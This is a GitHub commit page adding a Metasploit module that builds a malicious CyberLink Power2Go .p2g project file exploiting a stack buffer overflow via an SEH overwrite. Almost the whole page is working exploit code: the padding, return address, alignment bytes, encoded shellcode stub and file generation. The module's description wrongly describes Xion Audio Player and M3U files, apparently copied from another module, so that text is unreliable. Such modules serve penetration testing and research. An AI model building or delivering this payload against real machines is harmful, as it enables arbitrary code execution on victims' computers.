Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

exploit for cyberlinks Power2Go application. I find this software ins…

…talled by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier..
  • Loading branch information...
commit 9b0c211160b1a74ee38ff77a34e1e6737bdc7c48 1 parent 762324e
@net-ninja net-ninja authored
Showing with 116 additions and 0 deletions.
  1. +116 −0 modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
View
116 modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
@@ -0,0 +1,116 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'CyberLink Power2Go name attribute (.p2g) Stack Buffer Overflow Exploit',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in Xion Audio Player prior to version
+ 1.0.126. The vulnerability is triggered when opening a malformed M3U file that
+ contains an overly long string. This results in overwriting a
+ structured exception handler record.
+ },
+ 'License' => MSF_LICENSE,
+ 'Version' => "$Revision$",
+ 'Author' =>
+ [
+ 'modpr0be <modpr0be[at]spentera.com>', # initial discovery
+ 'mr_me <steventhomasseeley[at]gmail.com>' # msf module
+ ],
+ 'References' =>
+ [
+ ['OSVDB', '70600'],
+ ['URL', 'http://www.exploit-db.com/exploits/18220']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'InitialAutoRunScript' => 'migrate -f',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
+ [ 'CyberLink Power2Go 8 (XP/Vista/win7) XP Universal', { 'Ret' => "\x28\x4b" } ]
+ ],
+ 'DisclosureDate' => 'Sep 12 2011',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The output filename.', 'msf.p2g'])
+ ], self.class)
+ end
+
+ def get_payload(hunter)
+
+ [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
+ enc = framework.encoders.create(name)
+ if name =~ /unicode/
+ enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+ else
+ enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
+ end
+ # NOTE: we already eliminated badchars
+ hunter = enc.encode(hunter, nil, nil, platform)
+ if name =~/alpha/
+ #insert getpc_stub & align EDX, unicode encoder friendly.
+ #Hardcoded stub is not an issue here because it gets encoded anyway
+ getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
+ hunter = getpc_stub + hunter
+ end
+ }
+
+ return hunter
+ end
+
+ def exploit
+
+ title = rand_text_alpha(10)
+ buffer = ""
+ buffer << "\x41" * 778
+ buffer << "\x58\x28" # nseh
+ buffer << target['Ret'] # seh
+ buffer << "\x5f\x73" * 15 # pop edi/add [ebx],dh (after byte alignment)
+ buffer << "\x58\x73" # pop eax/add [ebx],dh (after byte alignment)
+ buffer << "\x40\x73" * 3 # inc eax/add [ebx],dh (after byte alignment)
+ buffer << "\x40" # inc eax
+ buffer << "\x73\x42" * 337 # add [ebx],dh/pop edx (after byte alignment)
+ buffer << "\x73" # add [ebx],dh (after byte alignment)
+ buffer << get_payload(payload.encoded)
+
+ p2g_data = <<-EOS
+ <Project magic="#{title}" version="101">
+ <Information />
+ <Compilation>
+ <DataDisc>
+ <File name="#{buffer}" />
+ </DataDisc>
+ </Compilation>
+ </Project>
+ EOS
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ file_create(p2g_data)
+ end
+end
Please sign in to comment.
Something went wrong with that request. Please try again.